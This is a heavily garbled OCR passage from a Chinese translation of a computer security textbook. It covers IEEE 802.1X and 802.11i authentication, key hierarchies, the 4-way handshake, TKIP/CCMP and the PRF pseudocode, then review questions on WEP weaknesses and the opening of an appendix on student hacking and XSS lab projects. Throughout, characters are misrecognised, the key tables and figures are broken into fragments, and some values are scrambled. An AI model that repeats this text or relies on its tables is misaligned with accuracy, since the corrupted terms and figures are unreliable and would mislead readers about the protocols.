于 认证 者 中 。 

在 认证 服务 豆 通 过 认证 协议 认证 一 个 请 求 者 之 前 ， 认 证 者 仅仅 在 该 请 求 者 和 认证 服务 器 之 
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间 传 输 控 制 和 认证 消息 。 此 时 802.1X 控制 信道 被 解除 阻塞 ， 而 802.11 数据 信道 被 阻塞 。 一 旦 
请 求 者 通过 认证 并 获取 密 钥 ， 认 证 者 就 会 转发 请 求 者 的 数据 ， 并 且 要 求 数据 满足 预定 义 的 访问 
控制 限制 ， 此 时 数据 信道 才 被 解除 阻塞 。 

如 图 24-9 所 示 ，802.1X 使 用 了 控制 端口 和 非 控 制 端口 的 概念 ， 端 口 是 定 义 在 认证 者 中 的 
逻辑 实体 ， 其 关系 到 物理 网 络 连接 。 在 一 个 无 线 局 域 网 中 ,认证 者 ( 接 入 点 ) 可 能 有 两 个 物理 
端口 : 一 个 用 于 连接 到 分 发 系统 ， 另 一 个 用 于 基本 服务 集 内 的 无 线 连 接 。 每 一 个 逻辑 端口 会 映 
射 到 其 中 一 个 物理 端口 。 不 管 请 求 者 的 认证 状态 如 何 ， 非 控制 端口 都 允许 请 求 者 与 其 他 认证 服 
务 器 之 间 的 PDU 交换 。 仅 当 请 求 者 的 状态 为 已 获取 认证 时 ， 控 制 端口 才 允 许 请 求 者 和 其 他 系 
统 之 间 的 PDU 交换 。 

具备 上 层 认 证 协议 的 802.1X 架构 恰好 符合 具有 知 干 无 线 工作 站 和 一 个 接 人 点 的 基本 服务 
集 架 构 。 然 而 对 于 没有 接 人 点 的 独立 基本 服务 集 (IBSS)，802.11i 提供 了 更 加 复杂 的 解决 方案 ， 


其 中 涉及 工作 站 之 间 的 对 偶 认 证 。 
a 
so ae 
认证 服务 器 
p 
一 之 j 


工作 站 
控制 端口 控制 端口 
到 基本 服务 集中 的 se 一 一 ~ 到 分 发 系统 


其 他 无 线 工作 站 ” 
图 24-9 802.1X 访问 控制 


MPDU 交换 图 24-8 中 下 方 部 分 展示 了 IEEE 802.11 认证 阶段 的 MPDU 交换 。 我 们 可 以 
把 认证 阶段 分 为 如 下 三 个 子 过 程 : 
e 连接 到 认证 服务 器 (AS): 工作 站 向 接 人 点 发 送 连接 到 认证 服务 器 的 请 求 。 接 入 点 接收 
请 求 ， 并 辐 认 证 服务 需 发 送 访问 请 求 。 
© 扩展 认证 协议 (EAP) 交换 : 这 一 交换 将 进行 工作 站 和 服务 需 间 的 双方 认证 。 还 可 以 有 
一 些 可 选 的 交换 ， 下 文 将 会 提 到 。 
e 安全 密 钥 分 发 : 一 旦 认证 成 立 ， 认 证 服务 器 会 产生 一 个 主 会 话 密 铀 (MSK) (也 被 称 作 
认证 - 授权 -核算 (AAA) 密 钥 ) 并 将 其 发 送 到 工作 站 。 所 有 的 用 于 安全 通信 的 密码 
学 密 钥 都 依据 MSK 产生 ，IEEE 802.11i 并 没有 指定 安全 传输 MSK 的 方法 ， 而 是 将 这 
个 任务 交 由 EAP 负责 。 不 管 使 用 何 种 方法 ， 都 需要 将 含有 加 密 过 的 MSK 的 MPDU 从 
认证 服务 器 (AS) 经 由 接 人 点 (AP) 传 给 工作 站 (STA). 
EAP 交换 ”正如 上 文 所 说 ， 有 一 些 可 能 的 EAP 交换 可 用 于 认证 阶段 。 一 般 情况 下 ， 工 作 
站 和 接 人 点 之 间 的 消息 流 使 用 基于 局 域 网 的 扩展 认证 协议 (EAPOL), BEA AIDA EARS #8 Z 
间 的 消息 流 使 用 远程 认证 拨 入 验证 服务 (Remote Authentication Dial In User Service, RADIUS) 
协议 ， 此 外 还 有 一 些 其 他 可 选 的 工作 站 - 接 人 点 间 ( STA-to-AP) 交换 和 接 入 点 -认证 服务 器 
a] ( AP-to-AS) 交换 。NIST SP 800-97 (建立 健 闪 的 安全 无 线 网 络 : IEEE802.11i 指南 ，2007 年 
2 H) 总 结 了 以 下 使 用 EAPOL 和 RADIUS 的 认证 交换 步骤 ; 
1. EAP 交换 始 于 接 人 点 向 工作 站 发 送 EAP- 请 求 /认证 帧 (EAP-Request/Identity frame), 
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2. 工作 站 将 EAP- 响应 / 认证 帧 (EAP-Response/Identity frame) 发 回 到 接 入 点 的 非 控 制 端 。 
数据 包 由 EAP 被 封装 到 RADIUS， 以 一 个 RADIUS-Access-Request 包 的 形式 传送 到 RADIUS 
IRIRE o 

3. AAA 服务 器 回复 RADIUS-Access-Challenge 包 ， 作 为 EAP 请 求 发 给 工作 站 。 这 是 一 种 
认证 类 型 的 请 求 ， 包 含 相关 的 挑战 信息 。 

4. 工作 站 构造 一 个 EAP 响应 消息 并 将 其 发 送 给 认证 服务 器 。 认 证 服务 器 将 响应 翻译 成 
RADIUS-Access-Request， 而 EAP 啊 应 消息 中 的 挑战 信息 作为 其 数据 段 。 根 据 所 用 EAP 方法 
的 不 同 , 第 3 步 和 第 4 步 可 能 重复 多 次 。 对 于 TLS 隧道 方法 来 说 ， 一 般 需要 重复 10 到 20 轮 。 

5. AAA 服务 需 发 送 RADIUS-Access-Accept 包 来 进行 授权 。 接 入 点 发 出 EAP 成 功 ( EAP- 
Success) 帧 。( 一 些 协 议 要 求 在 TLS 隧道 中 确认 EAP 成 功 帧 。) 随后 接 人 点 的 控制 端口 被 授 
权 ， 工 作 站 可 以 访问 网 络 。 

从 图 24-8 可 以 看 到 ， 尽 管 认证 成 功 了 ， 但 接 和 人 点 的 控制 端口 仍然 是 阻塞 的 。 直 到 完成 4 
次 握手 后 ， 临 时 密 钥 配置 到 工作 站 和 接 入 点 时 ， 接 入 点 的 控制 端口 才 会 开放 。 


24.4.5 ” 密 钥 管理 阶段 


在 密 钥 管理 阶段 将 会 生成 多 种 密码 学 密 钥 ， 并 分 发 到 各 工作 站 。 密 钥 可 以 分 为 两 种 类 型 ; 
对 偶 密 钥 ， 用 于 工作 站 和 接 入 点 之 间 通 信 ; 组 密 钥 ， 用 于 多 播 通信 。 参 考 [FRAN07]， 图 24-10 
展示 了 两 类 密 钥 的 层次 结构 。 表 24-3 分 别 定义 了 各 个 密 钥 。 


带 外 通信 EAP 方 法 通信 GMK ( 由 认证 
Pes AAAK 或 MSK P 服务 器 生成 ) 人 
预 分 享 密 钥 







256 位 用 户 定义 三 256 位 EAP 认 证 定期 或 需要 
ei ii 时 改变 
PMK y 和 
对 偶 主 密 钥 | 40 位 ，104 位 【WEP ) 
256 位 EAP 认 证 或 PSK 128 位 (CCMP ) 基于 策略 的 改变 
eine A 256 位 (TKIP ) (撤销 关联 、 撤 销 
认证 ) 
对 偶 临 时 密 钥 | 
384 位 (CCMP ) 
512 位 (TKIP ) 4 次 握手 
KCK KEK TK 
EAPOL HIER EH EAPOL 密 钥 加 密 密 钥 临时 密 钥 
128 位 T 128 位 ， CY. ”128 位 (CCMP ) T 
w o 256 位 ( TKIP ) 
这 些 密 钥 是 PTK 的 组 件 
a) 对 偶 密 钥 层次 结构 b) 组 密 钥 层次 结构 


图 24-10 IEEE 802.11i 密 钥 层次 结构 


R 24-3 IEEE 802.11i 数据 机 密 性 和 完整 性 协议 的 密 角 


AE 认证 -授权 -| 用 于 获取 PMK。 用 在 IEEE 802.1X 认 saé 密 钥 生成 密 钥 、 
核算 密 钥 证 、 密 钥 管理 方式 中 。 和 MMSK 相同 一 根 密 钥 
PSK 预 分 享 密 钥 在 预 分 享 密 钥 环境 下 成 为 PMK 密 钥 生 成 密 钥 、 


REH 


PMK 对 偶 主 密 钥 | 。 同 其 他 输入 一 起 用 于 获取 PTK 密 钥 生成 密 钢 
GMK HERH 同 其 他 输入 一 起 用 于 获取 GTK 密 钥 生 成 密 角 
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( 续 ) 


缩写 描述 /目的 大 小 类 型 


sed 源 于 PMK。 由 EAPOL-KCK, EAPOL- | 512 (TKIP) ke 
PTK WPA MT eH 复合 密 钥 








. 7 256 (TKIP) 
GTK 组 临时 密 钥 ers Hi FEL Dit kt 128 (CCMP) iit Ht 
= 40 104 (WEP) 
消息 完整 性 编 | TKIP Michael MIC 使 用 的 ， 用 于 提供 消 Asiku 
EAPOL ® #4 为 4 次 握手 阶段 的 密 钥 材 料 分 发 提供 完 
EAPOL-KCK 验证 密 钥 PH 消息 完整 性 密 钥 


a EAPOL # 4H 在 4 次 握手 中 为 保证 GTK 和 其 他 密 钥 流量 密 钥 / 密 铀 
加 密 密 钥 材料 提供 机 密 性 Ia AA 


WEP Key an 用 在 有 线 等 效 加 密 中 流量 密 钥 


对 偶 密 钥 ”对 偶 密 钥 用 于 一 对 设备 之 间 的 通信 ， 特 别 是 在 工作 站 和 接 和 人 点 之 间 。 这 些 密 钥 
构成 了 层次 关系 ， 其 他 密 钥 依据 主 密 钥 动态 生成 ， 临 时 使 用 一 段 时 间 。 

对 偶 密 钥 层 次 结构 的 顶层 有 两 种 密 钥 : 预 分 享 密 钥 (PSK) 和 主 会 话 密 钥 (MSK), MOF 
密 钥 (PSK) 是 被 接 人 点 和 工作 站 分 享 的 密 钥 ， 并 不 在 EEE 802.11i 的 范围 之 中 。 主 会 话 密 铀 
(MSK) 也 即 前 述 的 认证 - 授权 - 核算 密 钥 (AAAK)， 在 认证 阶段 由 IEEE 802.1X 协议 生成 。 
密 钥 生成 的 实际 方法 依赖 于 所 使 用 的 认证 协议 。 不 管 是 PSK 还 是 MSK， 接 人 点 和 与 之 通信 的 
工作 站 都 会 共享 一 个 唯一 的 密 钥 。 这 样 在 任 一 时 刻 ， 每 个 工作 站 都 有 一 个 密 钥 集 ， 而 接 人 点 对 
于 每 个 工作 站 都 有 一 个 密 钥 集 。 

xt (PMK) 源 自 于 主 密 钥 ， 若 使 用 PSK， 则 将 PMK FAVE PSK; 若 使 用 MSK， 则 
PMK 是 由 MSK 截取 而 来 的 。 在 认证 阶段 结束 时 ， 如 图 24-8 中 802.1x EAP 成 功 消 息 所 示 ， 接 
入 点 和 工作 站 都 有 一 份 共享 的 PMK。 

对 偶 临 时 密 钥 (PTK) 由 PMK 产生 而 来 ， 它 包含 了 三 种 用 于 在 工作 站 和 接 人 点 之 间 认 证 
之 后 相互 通信 的 密 钥 。PTK 密 钥 的 生成 需要 用 PMK 、 工 作 站 和 接 人 点 的 MAC 地址 以 及 随机 
数 计算 HMAC-SHA-1 摘要 函数 。 使 用 工作 站 和 接 人 点 地 址 来 生成 PTK 能 够 抵抗 会 话 支持 和 假 
冒 ， 随 机 数 提供 了 附加 的 随机 密 钥 材料 。 

PTK 的 三 个 部 分 如 下 所 示 : 

e 基于 局 域 网 的 扩展 认证 协议 (EAPOL) 密 钥 认 证 密 钥 (EAPOL-KCK): 文 持 在 RSN 安 

装 期 间 工 作 站 和 接 人 点 控制 帧 的 机 密 性 和 数据 可 靠 性 。 同 时 还 提供 PMK 所 有 权证 明 功 
能 ， 通 过 一 个 认证 实体 来 认证 对 PMK 的 所 有 权 。 

e EAPOL 密 钥 加 密 密 钥 ( EAPOL-KEK): 保护 RSN 关联 过 程 中 密 钥 和 其 他 数据 的 机 

e 临时 密 钥 : 提供 对 用 户 流量 的 真正 保护 。 

组 密 钥 ”组 密 钥 用 于 一 个 工作 站 发 送 MPDU 给 多 个 工作 站 时 的 多 播 传输 。 组 密 钥 层 次 结 
构 的 顶层 是 组 主 密 钥 (GMK), GMK 是 一 种 用 于 生成 密 钥 的 密 钥 ， 和 其 他 输入 配合 产生 组 临 
时 密 钥 (GTK)。 和 PTK 由 接 人 点 和 工作 站 生成 所 不 同 的 是 ，GTK 由 接 人 点 和 与 之 关联 的 多 个 


KEK, TK 和 MIC-key (作为 TKIP) 组 成 
[=] TKIP 或 CCMP 一 起 提供 单 播 用 户 流 | 256 (TKIP) 
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党 五 部 分 MAES” 


工作 站 生成 。IEEE 802.11i 没有 定义 准确 的 GTK 生成 方法 ， 但 是 要 求 GTK 的 值 具备 伪 随 机 性 。 


GTK 的 安全 分 发 使 用 已 创建 的 对 偶 密 钥 ， 设 备 每 次 离开 网 络 时 密 钥 都 会 改变 。 


对 偶 密 钥 的 分 发 ”图 24-11 上 半 部 分 展示 了 对 偶 密 钥 分 发 过 程 的 MPDU 交换 ， 称 作 4 次 
握手 。 工 作 站 和 接 人 点 使 用 4 次 握手 来 确认 PMK 的 存在 ， 验 证 所 选 的 加 密 套件 ， 为 下 一 步 数 


据 会 话 获 得 新 生成 的 PTK。 交 换 过 程 可 以 分 为 如 下 4 步 : 
e 接 入 点 一 工作 站 : 消息 包含 接 入 点 的 MAC 地 址 和 一 个 随机 值 (Anonce). 


e 工作 站 一 接 入 点 : 工作 站 也 产生 一 个 自己 的 随机 值 ( Snonce)。 使 用 双方 MAC 地 址 、 
两 个 随机 值 和 PMK 来 生成 PTK。 工 作 站 随后 将 包含 MAC 地 址 和 Snonce 的 消息 发 送 
给 接 入 点 ， 接 入 点 以 此 可 以 生成 同样 的 PTK。 这 条 消息 中 含有 一 个 使 用 HMAC-MD5 
或 者 HMAC-SHA-1-128 摘要 算法 的 消息 完整 性 编码 (MIC)， 算 法 使 用 的 密 钥 是 KCK。 

e 接 入 点 一 工作 站 : 上 一 步 完 成 后 ， 接 人 点 生成 了 PTK， 然 后 发 送 一 条 消息 给 工作 站 ， 


‘ 
” 


内 容 和 第 一 条 消息 基本 一 致 ， 还 附带 MIC. 
e 工作 站 一 接 入 点 : 工作 站 发 送 确 认 消息 ， 同 样 附 带 MIC. 


工作 站 





消息 2 传送 另 一 个 随机 值 到 
接 入 点 使 其 生成 PTK， 问 接 入 
点 表明 工作 站 在 线 ， 确 保 PTK 
是 最 新 的 且 没 有 中 间 人 攻击 者 


消息 4 是 对 消息 3 的 确认 ， 不 
具有 密码 学 功能 ， 确 保 组 密 钥 
握手 过 程 的 可 靠 开 始 





工作 站 解密 并 安装 GTK 


消息 2 分 发 到 接 入 点 ， 
该 帧 仅 作为 对 接 入 点 的 
啊 应 


图 24-11 


的 交换 都 包含 如 下 两 步 : 


接 入 点 802.1X 控 制 端口 阻塞 


接 入 点 802.1X 控 制 端口 
对 单 播 流量 开放 


BEA KA 
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消息 1 

EAPOL #24 ( Anonce， 单 播 ) 

消息 2 
EAPOL 密 钥 ( Snonce， 

单 播 , MIC ) 

消息 3 
EAPOL 密 钥 ( 安装 PTK， 
单 播 , MIC ) 


消息 4 
EAPOL 密 钥 ( 单 播 , MIC ) 


消息 1 传送 随机 值 到 工作 站 
使 其 生成 PTK 


消息 3 回 工 作 站 表明 认证 者 在 
线 ， 确 保 PTK 是 最 新 的 且 没 有 中 
间 人 攻击 者 








消息 1 
EAPOL 密 钥 ( GTK, MIC ) 


消息 2 
EAPOL 密 钥 (MIC ) 


消息 1 分 发 一 个 新 的 GTK 给 工 
作 站 。GTK 被 加 密 且 由 MIC 保 证 
完整 性 


接 入 点 安装 GTK 


IEEE 802.11i 操作 流程 : 4 次 握手 和 组 密 钥 握手 
组 密 钥 的 分 发 、 接 入 点 生成 GTK， 将 其 分 发 到 多 播 组 的 每 一 个 工作 站 。 针 对 每 个 工作 站 
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e 接 入 点 一 工作 站 : 接 人 点 发 送 的 消息 内 容 为 使 用 RC4 或 者 AES 加 密 的 GTK， 其 中 所 
用 密 钥 为 KEK。 消 息 中 附带 MIC. 
e 工作 站 一 接 入 点 : 工作 站 发 回 对 GTK 的 确认 响应 ， 消 息 中 仍 附 带 MIC。 


24.4.6 ”保护 数据 传输 阶段 


IEEE 802.11i 定 义 了 两 种 保护 802.11 MPDU 数据 传输 的 方案 : 临时 密 钥 完整 性 协议 
( Temporal Key Integrity Protocol, TKIP) 和 计数 器 模式 密码 块 链 消 息 完 整 码 协议 ( Counter 
mode-CBC MAC Protocol，CCMP ) 。 

TKIP 使 用 旧 的 无 线 网 安全 方案 WEP (Wired Equivalent Privacy) 的 设备 仅 需要 改变 软件 
(无 须 改变 硬件 ) 就 可 以 实现 TKIP. TKIP 提供 了 两 种 服务 : 

e 消息 完整 性 : TKIP 在 802.11 MAC 帧 中 数据 字段 后 添加 消息 完整 性 编 怒 。MIC 由 一 

名 为 Michael 的 算法 生成 ， 使 用 源 MAC 地 址 、 目 的 MAC 地址 、 数 据 字 段 和 密 钥 材料 
作为 输入 来 计算 一 个 64 位 的 摘要 值 。 

e 数据 机 密 性 : 用 RC4 算法 加 密 MPDU 和 MIC. 

256 位 的 TK (如 图 24-10 所 示 ) 按 如 下 方式 使 用 ， 其 前 128 位 被 截断 成 两 个 64 17 
用 于 Michael 消息 摘要 算法 生成 消息 完整 性 编码 MIC， 一 个 密 钥 用 于 保护 工作 站 到 接 入 点 的 消 
息 ， 另 一 个 密 钥 用 于 保护 接 人 点 到 工作 站 的 消息 。 剩 余 128 位 生成 用 于 加 密 传 输 数 据 的 RC4 
加 密 密 钥 。 

作为 附加 保护 ， 为 每 个 帧 分 配 一 个 单调 递增 TKIP 序列 计数 器 (TSC) TSC 有 两 个 目的 ， 
其 一 是 每 个 MPDU 都 含有 一 个 TSC， 且 被 MIC 保护 ， 从 而 防止 消息 受到 重 放 攻 击 ; 另 一 个 目 
的 是 和 会 话 TK 联合 在 一 起 产生 动态 加 密 密 钥 ， 每 一 次 传输 MPDU 时 密 钥 动态 改变 ， 从 而 使 
密码 破译 更 加 困难 。 

CCMP CCMP 用 在 新 的 能 够 支持 这 一 方案 的 IEEE 802.11 设备 上 。 和 TKIP 一 样 ，CCMP 
提供 两 种 服务 : 

。 消息 完整 性 : CCMP 使 用 密码 分 组 链接 消息 认证 编码 ( CBC-MAC)。 该 编码 在 本 书 第 

12 章 介绍 过 。 
e 数据 机 密 性 : CCMP 使 用 CTR 组 密码 模型 配合 AES 来 加 密 。CTR 在 本 书 第 20 章 介 
绍 过 。 

CCMP 的 完整 性 和 机 密 性 通过 使 用 相同 的 128 位 AES 密 钥 来 保证 。 该 方案 使 用 48 位 的 包 

编码 构造 一 个 随机 值 来 避免 重 放 攻 击 。 


24.4.7 IEEE 802.11i 伪 随 机 函数 


在 IEEE 802.11i 方 案 的 很 多 地 方 需要 用 到 伪 随 机 函数 (PRF)。 例如， 生成 随机 值 ， 扩 展 对 
偶 密 钥 和 生成 GTK 等 。 最 好 的 安全 实践 是 不 同 的 伪 随 机 数 流 用 于 不 同 的 目的 。 ia 
(RF A ABLE PR 

PRF 基于 HMAC-SHA-1 摘要 函数 生成 的 伪 随 机 比特 流 。HMAC-SHA-1 使 用 一 个 消息 和 
一 个 长 度 至 少 为 160 位 的 密 钥 来 产生 一 个 160 位 的 散 列 值 。SHA-1 有 一 个 属性 ， 即 输入 数据 改 
变 1 位 就 会 生成 一 个 全 新 的 散 列 值 ， 这 一 性 质 是 伪 随 机 数 肾 数 的 基础 。 

IEEE 802.11i PRF 以 4 个 参数 作为 输入 ， 产 生 所 需 数量 的 随机 比特 。 函 数 的 原型 为 PRF 
(K, 4, B, Len) ， 其 输入 参数 的 含义 分 别 如 下 : 

K= Fe eH 

4 一 应 用 程序 特定 的 字符 串 (如 随机 值 生成 、 对 偶 密 钥 扩 展 ) 


516 BLED WBE 


8 二 针对 特定 情况 的 数据 
Len 二 伪 随 机 比特 的 预期 长 度 
例如 ， 对 于 CCMP 所 用 的 对 偶 临 时 密 钥 来 说 ， 
PTK = PRF(PMK, “Pairwise key expansion” , min(AP-Addr, STA-Addr) || max (AP-Addr, STA- 
Addr)||min(Anonce, Snonce)||max(Anonce, Snonce), 384) 
对 于 这 种 情况 ， 输 入 参数 的 含义 如 下 : 
K=PMK 
“4= 字 符 串 “Pairwise key expansion” 
B= 将 双方 MAC 地 址 和 随机 值 连接 起 来 生成 的 字 节 序列 
Len = 384 位 
类 似 地 ， 一 个 随机 值 (nonce) 可 以 用 如 下 方法 产生 : 


Nonce = PRF(Random Number,"Init Counter", MAC || 
Time, 256) 


FEA, Time 是 随机 数 发 生 器 已 知 的 网 络 时 间 的 测量 
值 。 组 临时 密 钥 可 由 如 下 公式 生成 : 


GTK=PRF(GMK, “Group key expanse” , MAC||Gnonce, 
256) 


图 24-12 对 函数 PRF(K, A, B, Len) 进行 了 说 明 ， 参 数 
K 用 于 HMAC 的 密 钥 输入 。 消 息 的 输入 由 参数 4、 一 个 全 
0 字 节 、 参 数 刀 、 一 个 计数 器 ii 连接 而 成 。 计 数 器 的 初始 
值 为 0。HMAC 算法 执行 一 次 生成 一 个 160 位 的 散 列 值 。 
如 果 需 要 更 多 的 随机 值 ， 就 让 计数 器 i 自 增 ， 用 同样 的 输 。 人 AD 
入 再 执行 HMAC， 直 到 生成 足够 的 位 数 为 止 。 函 数 的 逻辑 M2412 TERE 802.111 PSRDLER RS 
可 以 表示 为 : 

PRF (K, A, B, Len) 

R =< null string 

for i < 0 to ((Len + 159)/160 - 1) do 


R <— R||HMAC-SHA-1(K, AllO|l| Bll i) 
Return Truncate-to-Len(R, Len) 


24.5 ”关键 术语 、 复 习题 和 习题 





关键 术语 

4-way handshake ( 4 次 握手 ) Medium Access Control (MAC， 媒 介 访 问 控制 ) 

Access Point (AP， 接 人 点 ) MAC header (MAC 头 部 ) 

Basic Service Set (BSS， 基 本 服务 集 ) MAC Protocol Data Unit(MPDU , MAC 协议 数据 单元 ) 

Counter mode-CBC MAC Protocol (CCMP, ， 计 数 需 © MACService Data Unit (MSDU, MAC 服务 数据 
模式 密码 块 链 消息 完整 码 协 议 ) 单元 ) 

Distribution System (DS， 分 发 系统 ) MAC trailer (MAC 尾部 ) 

Extended Service Set (ESS， 扩 展 服务 集 ) Message Integrity Code (MIC， 消 息 完整 性 编码 ) 

group keys (组 密 钥 ) pairwise keys (对 偶 密 钥 ) 

Independent BSS (IBSS， 独 立 基 本 服务 集 ) physical layer ( 物理 层 ) 


Logical Link Control (LLC, i2 48542472 fil ) pseudorandom function ( 伪 随 机 函数 ) 
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Robust Security Network (RSN， 强 健 安全 网 络 ) Wi-Fi Protected Access (WPA, Wi-Fi 保护 访问 ) 

Temporal Key Integrity Protocol ( TKIP， 临 时 密 钥 Wired Equivalent Privacy (WEP， 有 线 等 效 加 密 ) 
完整 性 协议 ) Wireless LAN (WLAN， 无 线 局 域 网 ) 

复习 题 


24.1 802.11 无 线 局 域 网 的 基本 结构 单元 是 什么 ? 
24.2 ”定义 一 个 扩展 服务 集 。 

24.3 列 出 并 简要 定义 IEEE 802.11 服务 。 

24.4 分 发 网 络 是 无 线 网 络 吗 ? 

24.5 与 移动 性 相关 的 关联 的 概念 是 什么 ? 

24.6 IEEE 802.11i 所 负责 的 安全 区 域 有 哪些 ? 

24.7 简要 描述 IEEE 802.11i 操作 流程 的 4 个 阶段 。 
24.8 TKIP 和 CCMP 的 区 别 是 什么 ? 


习题 


24.1 在 IEEE 802.11 中 ， 开 放 系 统 认 证 过 程 包含 两 次 通信 。 认 证 是 由 客户 请 求 的 ,包含 了 工作 站 ID 
(一 般 是 MAC 地 址 )。 随 后 的 通信 是 由 接 和 人 点 或 者 路 由 器 发 回 的 认证 响应 ， 其 中 包含 成 功 或 失 
败 消 息 。 如 果 客 户 端的 MAC 地 址 在 接 人 点 或 者 路 由 器 配置 的 认证 列表 中 明确 标记 为 拒绝 ， 则 
表明 请 求 失 败 。 
a. 该 认证 方案 的 优势 有 哪些 ? 
b. 该 认证 方案 的 安全 弱点 有 哪些 ? 

24.2 在 IEEE 802.11i 引入 之 前 ，IEEE 802.11 的 安全 方案 是 有 线 等 效 加 密 ( WEP)。WEP 假设 所 有 在 同 
一 个 网 络 中 的 设备 共享 一 个 私 钥 。 认 证 过 程 的 目的 是 让 工作 站 证 明 自 己 具 有 该 私 钥 。 认 证 过 程 如 
图 24-13 所 示 ， 工 作 站 向 接 入 点 发 出 认证 请 求 消息 ， 接 入 点 发 出 一 个 认证 挑战 ， 它 是 由 128 个 随机 
比特 组 成 的 文本 序列 。 工 作 站 用 共享 密 钥 加 密 该 挑战 ， 将 其 传 回 到 接 入 点 。 接 入 点 解密 ， 并 与 之 
前 发 出 的 挑战 相 比 较 。 如 果 完 全 匹配 ， 接 入 点 会 确认 认证 成 功 。 
a. 该 认证 方案 的 优势 有 哪些 ? 
b. 该 认证 方案 是 不 完整 的 。 缺 少 了 什么 重要 内 容 ? 为 什么 ”提示 : 用 一 到 两 条 附加 消息 可 以 解决 

该 问题 。 
c. 该 方案 的 密码 学 弱点 是 什么 ? 
工作 站 








工作 站 发 送 认证 请 求 
接 入 点 发 送 包含 128 位 
随机 值 的 挑战 消息 
工作 站 响应 挑战 的 
加 密 版 本 
接 入 点 解密 挑战 响应 。 
如 果 匹 配 ， 则 发 送 认 证 
成 功 消息 


图 24-13 WEP 认证 
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24.3 


对 于 WEP 来 说 ， 数 据 完整 性 和 数据 机 密 性 由 RC4 流 加 密 算法 来 保证 。MPDU 的 发 送 者 执行 以 下 

步骤 ， 称 为 封装 : 

1. 发 送 者 选择 初始 向 量 (V) 值 。 

2. 将 灰 值 与 发 送 者 和 接收 者 共享 的 WEP 密 钥 连接 起 来 ， 生 成 RC4 的 种 子 密 钥 。 

3. 对 整个 MAC 数据 段 计 算 32 位 循环 元 余 校 验 (CRC)， 并 将 校 验 码 附加 到 数据 段 之 后 。CRC 是 数 
据 链 路 层 协 议 常 用 的 错误 校 验 编码 。 在 这 里 ，CRC 用 作 完 整 性 校 验 值 (ICV )。 

4. 将 第 三 步 得 到 的 结果 进行 RC4 加 密 ， 生 成 密 文 块 。 


‘。5. 将 明文 IV 预先 插入 密 文 块 以 构造 封装 好 的 MPDU 来 进行 传输 。 


24.4 


a. 画 一 个 结构 图 来 说 明 封 装 过 程 。 

b. 描述 接收 端 恢复 原文 本 并 计算 完整 性 校 验 的 过 程 。 

c. 画 一 个 结构 图 来 说 明 问 题 b 的 过 程 。 
CRC 作为 完整 性 校 验 的 一 个 潜在 弱点 源 于 它 是 一 个 线性 函数 。 这 意味 着 当 消 息 中 单独 一 个 比特 发 
生变 化 时 可 以 预测 出 CRC 的 哪 一 个 比特 会 发 生变 化 。 此 外 还 可 以 判断 出 再 翻转 哪 一 个 比特 能 够 使 
得 最 终 CRC 保持 不 变 。 这 样 一 条 消息 的 多 种 翻转 组 合 会 得 到 相同 的 CRC 编码 ， 从 而 破坏 了 完整 
性 校 验 的 目的 。 然 而 ， 在 WEP 中， 如果 攻击 者 不 知道 加 密 密 钥 ,那么 仅 通 过 密 文 块 无 法 得 到 明文 
文本 。 这 是 否 意味 着 完整 性 校 验 值 (ICV) 不 会 受到 比特 翻转 攻击 ?请 解释 原因 。 


| 附录 A 


Computer Security: Principles and Practice, 4th Edition 


计算 机 安全 教学 项 目 和 学 生 练习 





很 多 教师 都 相信 ， 做 研究 或 者 做 些 实践 项 目 对 学 生 深刻 理解 计算 机 安全 具有 重要 的 意义 。 
如 果 没 有 实践 ， 学 生 们 就 很 难 掌握 一 些 基本 的 安全 概念 及 这 些 概 念 之 间 的 相互 关系 。 实 践 项 目 
能 够 使 学 生 加 深 对 书本 知识 的 理解 ， 使 学 生 对 密码 学 的 算法 或 者 协议 是 如 何 工作 的 等 有 非常 直 
观 的 了 解 ; 而 且 能 够 激励 学 生 ， 使 他 们 相信 自己 不 仅 理解 ， 而 且 能 够 实现 与 安全 功能 有 关 的 技 
术 细 节 。 

本 书 中 ， 我 们 尽力 表述 清楚 计算 机 安全 的 概念 ， 同 时 也 提供 了 很 多 作业 使 读者 加 深 对 这 
些 概念 的 理解 。 然 而 ,教师 们 希望 能 够 将 这 些 作业 补充 到 实践 项 目 中 。 本 附录 提供 了 一 些 相关 
的 指导 ， 并 在 专 为 本 书 建立 的 教师 资源 中 心 (IRC) 中 对 辅助 资料 进行 了 说 明 。 教 师 可 以 通过 
培 生 (Pearson) 出 版 公司 获取 这 些 指导 信息 。 这 些 辅助 材料 涵盖 了 以 下 11 类 项 目 和 其 他 学 生 
练习 : 
黑客 项 目 
实验 室 练习 项 目 
安全 教育 (SEED) 项 目 
研究 项 目 
编程 项 目 
实际 的 安全 评估 
防火 墙 项 目 
案例 学 习 
阅读 /报告 作业 
写作 作业 
计算 机 安全 教学 网 络 广播 


A.1 墨客 项 目 


这 个 项 目的 目标 是 通过 一 系列 步骤 来 人 侵 一 个 公司 的 网 络 系统 。 这 个 公司 被 称 为 极端 安全 
公司 ( Extreme In Security Corporation)。 就 像 它 的 名 字 所 预示 的 那样 ， 这 个 公司 存在 安全 上 的 
漏洞 。 一 个 非常 聪明 的 黑客 能 够 入侵 到 它 的 网 络 系统 ， 并 盗 取 相关 的 重要 信息 。 在 IRC 中 包 
括 一 些 用 来 建立 一 个 Web 站 点 的 导航 资料 。 而 学 生 们 的 任务 就 是 攻击 这 个 站 点 ， 并 知 取 该 公 
司 将 在 下 周 竞标 某 个 政府 工程 合同 中 的 竞标 价格 。 - 

学 生 们 要 通过 攻击 这 个 Web 站 点 ， 找 到 一 个 进入 该 公司 内 部 网 络 的 途径 。 每 当 学 生 们 完 
成 一 个 步骤 ， 他 们 将 会 得 到 进入 下 一 步骤 的 提示 ， 而 且 还 有 等 级 的 提升 ， 直 到 他 们 最 终 到 达 一 
个 要 求 的 等 级 。 

这 个 项 目 可 以 用 以 下 3 种 方式 尝试 : 

1. 不 能 寻求 任何 形式 的 帮助 ; 

2. 可 以 使 用 项 目 中 的 提示 ; 

3. 使 用 准确 的 说 明 。 

IRC 中 包含 有 该 项 目 所 需 的 一 些 文件 : 
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1. Web 安全 项 目 ， 命 名 为 extremeinsecure (extremeinsecure.zip ) 。 
2. Web 黑客 攻击 练习 (XSS 和 脚本 攻击 )， 分 别 包 含 客户 端 和 服务 需 冰 的 漏洞 利用 方法 
(webhacking.zip ) . 
3. 以 上 软件 的 安装 和 使 用 说 明文 档 (description.doc ) . 
4. 一 个 描述 Web 站 点 人 侵 的 ppt 讲稿 文档 ( Web_Security.ppt)。 这 个 文档 清楚 地 阐明 了 如 
